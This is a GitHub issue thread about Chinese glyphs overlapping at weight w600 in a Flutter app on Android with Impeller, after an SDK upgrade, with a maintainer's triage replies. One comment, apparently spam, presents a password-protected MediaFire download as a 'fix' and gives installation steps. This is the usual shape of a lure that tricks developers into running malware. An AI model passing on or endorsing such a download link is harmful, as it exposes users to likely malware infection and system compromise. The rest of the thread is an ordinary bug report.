### ISSUE TITLE
[Android]  The Chinese characters'囊' overlap together  after upgrading flutter Sdk

### ISSUE THREAD

**Issue by liuzehnhang** [flutter/flutter#154232]
### Steps to reproduce

My previous version was 3.22.3，Chinese characters display normally，After upgrading Flutter, the font display was abnormal
FontWeight-w600 Chinese characters display abnormally

My phone is Xiaomi 13 
Android 14 
impeller enabled

### Expected results

Display fonts normally

### Actual results

The Chinese characters'囊' overlap together

### Code sample

<details open><summary>Code sample</summary>

```dart
Text("心益好胶囊",style: TextStyle(color: Color(0xFF1E1E1E),fontSize: 16,fontWeight: FontWeight.w600,decoration: TextDecoration.none,),),
```

</details>

### Screenshots or Video

</details>
![WechatIMG321](https://github.com/user-attachments/assets/54cf8bb4-dc06-4963-aebf-0a8ec6a468e2)

### Logs

<details open><summary>Logs</summary>

```console
[Paste your logs here]
```

</details>

### Flutter Doctor output

<details open><summary>Doctor output</summary>

```console
`/Users/wyy/developer/android/sdk/flutter/bin/flutter doctor --verbose
[✓] Flutter (Channel master, 3.25.0-1.0.pre.147, on macOS 14.4.1 23E224 darwin-arm64, locale zh-Hans-CN)
• Flutter version 3.25.0-1.0.pre.147 on channel master at /Users/wyy/developer/android/sdk/flutter
• Upstream repository https://github.com/flutter/flutter.git
• Framework revision https://github.com/flutter/flutter/commit/99dc3beaf43d058415b69877f69be6ffd838d813 (7 小时前), 2024-08-26 22:10:32 -0400
• Engine revision b41ca79092
• Dart version 3.6.0 (build 3.6.0-175.0.dev)
• DevTools version 2.39.0-dev.15
• Pub download mirror https://pub.flutter-io.cn/
• Flutter download mirror https://storage.flutter-io.cn/

[✓] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
• Android SDK at /Users/wyy/Library/Android/sdk
• Platform android-35, build-tools 34.0.0
• ANDROID_HOME = /Users/wyy/Library/Android/sdk
• Java binary at: /Applications/Android Studio.app/Contents/jbr/Contents/Home/bin/java
• Java version OpenJDK Runtime Environment (build 17.0.11+0-17.0.11b1207.24-11852314)
• All Android licenses accepted.`
```

</details>

**Comment by liuzehnhang** [comment]
![WechatIMG321](https://github.com/user-attachments/assets/b3077eec-1774-489d-82bb-2caa43647742)

**Comment by pyrosensei** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by darshankawar** [comment]
Looks like similar to https://github.com/flutter/flutter/issues/154166, so please follow-up in it for further updates.
Closing this as duplicate. If you disagree, write in comments and I'll reopen it.

**Comment by liuzehnhang** [comment]
It's not the same issue， # 154166 has been resolved in   fluttert   Channel master 3.25.0-1.0.pre.147

**Comment by darshankawar** [comment]
> impeller enabled

@liuzehnhang Does it show same behavior without impeller ?
